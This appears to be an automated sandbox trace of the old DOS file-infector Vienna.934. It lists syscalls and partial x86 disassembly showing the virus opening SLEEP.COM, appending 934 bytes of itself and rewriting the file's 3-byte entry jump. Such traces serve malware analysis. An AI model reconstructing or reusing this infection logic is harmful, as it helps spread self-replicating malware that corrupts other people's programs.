Sample viewer

vx.netlux.org/Virus.DOS.Vienna.934

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:00:58.268654536Z 48 PC: 12a62 | Get DOS version
2018-12-17T23:00:58.282689792Z 44 PC: 12a71 | Get time 0x12a71: cmp dl, 4
0x12a74: jb 0x12a79
0x12a76: jmp 0x12aba
0x12a78: nop
0x12a79: mov dl, byte ptr [bx + si + 0x8a]
0x12a7d: or dl, dl
0x12a7f: je 0x12a8b
0x12a81: sub dl, 0x4b
0x12a84: mov ah, 2
0x12a86: int 0x21
0x12a88: inc bx
0x12a89: jmp 0x12a79
0x12a8b: mov ah, 0x2a
0x12a8d: int 0x21
0x12a8f: cmp cx, 0x7c8
0x12a93: jl 0x12ab0
0x12a95: cmp dh, 2
0x12a98: jl 0x12ab0
0x12a9a: mov al, 2
0x12a9c: mov cx, 0xff
2018-12-17T23:00:58.285319105Z 47 PC: 12ac0 | Get disk transfer address
2018-12-17T23:00:58.286729743Z 26 PC: 12ad6 | Set disk transfer address
2018-12-17T23:00:58.288289019Z 78 PC: 12b6f | Find first file
2018-12-17T23:00:58.29483809Z 67 PC: 12bb6 | Get or set file attributes
2018-12-17T23:00:58.300649381Z 67 PC: 12bca | Get or set file attributes
2018-12-17T23:00:58.315916319Z 61 PC: 12bd7 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:00:58.323165772Z 87 PC: 12be5 | Get or set file date and time
2018-12-17T23:00:58.32486786Z 44 PC: 12bf4 | Get time 0x12bf4: nop
0x12bf5: and dh, 3
0x12bf8: jmp 0x12bfb
0x12bfa: nop
0x12bfb: mov ah, 0x3f
0x12bfd: mov cx, 3
0x12c00: mov dx, 0xa
0x12c03: nop
0x12c04: add dx, si
0x12c06: int 0x21
0x12c08: nop
0x12c09: jb 0x12c64
0x12c0b: nop
0x12c0c: cmp ax, 3
0x12c0f: jne 0x12c64
0x12c11: mov ax, 0x4202
0x12c14: xor cx, cx
0x12c16: xor dx, dx
0x12c18: nop
0x12c19: int 0x21
2018-12-17T23:00:58.327294318Z 63 PC: 12c08 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:00:58.335645737Z 66 PC: 12c1b | Move file pointer
2018-12-17T23:00:58.337302196Z 64 PC: 12c42 | Write file or device (Write 934 bytes on handle 5)
2018-12-17T23:00:58.357681381Z 66 PC: 12c53 | Move file pointer
2018-12-17T23:00:58.370999183Z 64 PC: 12c63 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:00:58.378557177Z 87 PC: 12c78 | Get or set file date and time
2018-12-17T23:00:58.38034708Z 62 PC: 12c7d | Close file
2018-12-17T23:00:58.389094088Z 67 PC: 12c8e | Get or set file attributes
2018-12-17T23:00:58.398918425Z 26 PC: 12c9d | Set disk transfer address